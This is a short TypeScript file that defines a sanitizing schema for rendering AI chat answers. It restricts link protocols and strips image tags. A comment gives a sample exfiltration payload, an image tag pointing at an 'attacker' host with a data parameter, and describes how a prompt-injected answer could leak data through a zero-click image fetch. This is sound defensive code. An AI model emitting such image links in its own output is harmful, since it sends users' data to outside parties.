import { defaultSchema, type Options } from 'rehype-sanitize';
import { AI_CHAT_CUSTOM_PROTOCOL } from './aiChatLinkResolver';

const AI_CHAT_ALLOWED_HREF_PROTOCOLS = ['tel', 'mailto', 'https', AI_CHAT_CUSTOM_PROTOCOL] as const;

export const aiChatSanitizeSchema: Options = {
    ...defaultSchema,
    // No images: an injected answer could embed <img src="https://attacker/x.png?data="> that the
    // browser fetches with no click. Dropping the tag beats leaving an <img> with a stripped src.
    tagNames: defaultSchema.tagNames?.filter((tagName) => tagName !== 'img'),
    protocols: {
        ...defaultSchema.protocols,
        href: [...AI_CHAT_ALLOWED_HREF_PROTOCOLS],
    },
};
